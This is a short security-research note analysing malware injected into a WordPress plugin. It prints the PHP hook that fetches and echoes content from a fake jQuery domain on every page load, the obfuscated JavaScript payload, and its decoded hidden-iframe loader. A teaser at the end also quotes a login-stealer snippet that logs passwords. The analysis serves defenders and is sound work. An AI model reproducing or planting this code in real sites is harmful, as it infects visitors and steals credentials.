New juquery.com injection

  • July 8, 2013
Labs Note

Today we found a malicious iframe that was being loaded from juquery.com (another fake jquery site). Itconsisted of the following code hidden inside one of the plugins:

  function browser_compability() {  
    if(function_exists('curl_init'))  
            {  
          $url = "httx://www. juquery.com/jquery-1.6.3.min.js";  
              $ch = curl_init();  
                  $timeout = 10;  
               curl_setopt($ch,CURLOPT_URL,$url);  
              curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);  
            curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);  
            $data = curl_exec($ch);  
          curl_close($ch);  
        echo "$data";  
      }  
   }  
   add_action('wp_head', 'browser_compability');

It forces the site to contact juquery.com/jquery-1.6.3.min.js on every page load and display whatever content is provides. Itis currently displaying the following malicious payload (triggered by sitecheck):

<script type="text/javascript">var hs_frf=document.createElement("script");hs_frf.setAttribute("type","text/javascript");
var _0xa6df=["\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6A\x75\x71\x75\x65\x72..
var hs_fln=_0xa6df[0]+Math[_0xa6df[1]]();hs_frf.setAttribute("src",hs_fln);if (typeof hs_frf!="undefined");
document.getElementsByTagName("head")[0]. appendChild(hs_frf);</script>

Which creates another iframe based on the payload hosted at: httx://www.juquery.com/compability.php?0.09432658250443637:

var _0x2c3c=["\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65...
var hs_ifr=document[_0x2c3c[1]](_0x2c3c[0]);hs_ifr[_0x2c3c[2]]=_0x2c3c[3];var hs_len=...
document[_0x2c3c[14]][_0x2c3c[13]] (hs_ifr);

Which also decodes to the iframe loading script:

var hs_ifr = document['createElement']('iframe');
hs_ifr['id'] = '687474703A2F2F6269742E6C792F31626C31736A66';
var hs_len = hs_ifr['id']['length'];
for (var i = 0; i < hs_len; i += 2) {
    hs_ifr['id'] += String["fromCharCode"](parseInt(hs_ifr['id']['substr'](i, 2), 16));
};
hs_ifr["id"] =  hs_ifr['id']['substr'](hs_len);
hs_ifr["style"]['display'] =  'none';
hs_ifr["style"]['width'] = 0;
hs_ifr["style"]['height'] = 0;
hs_ifr["src"] = hs_ifr['id'];
document["body"]["appendChild"] (hs_ifr);

It seems that fake jquery sites are becoming more and more popular and only jquery.com and jquery.org shouldbe trusted.

Fioravante "Fio" Souza is Sucuri’s Vulnerability Research & Machine Learning Manager who joined the company in 2012. Fio’s main responsibilities include dealing with emerging web threats. His professional experience covers 18 years of information security. When Fio isn’t dealing with web threats, you might find him fermenting everything he can find. Connect with Fio on Twitter or Untappd.

Related Tags
Related Categories
You May Also Like
Labs Note

Simple WP login stealer

  • July 28, 2019
We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post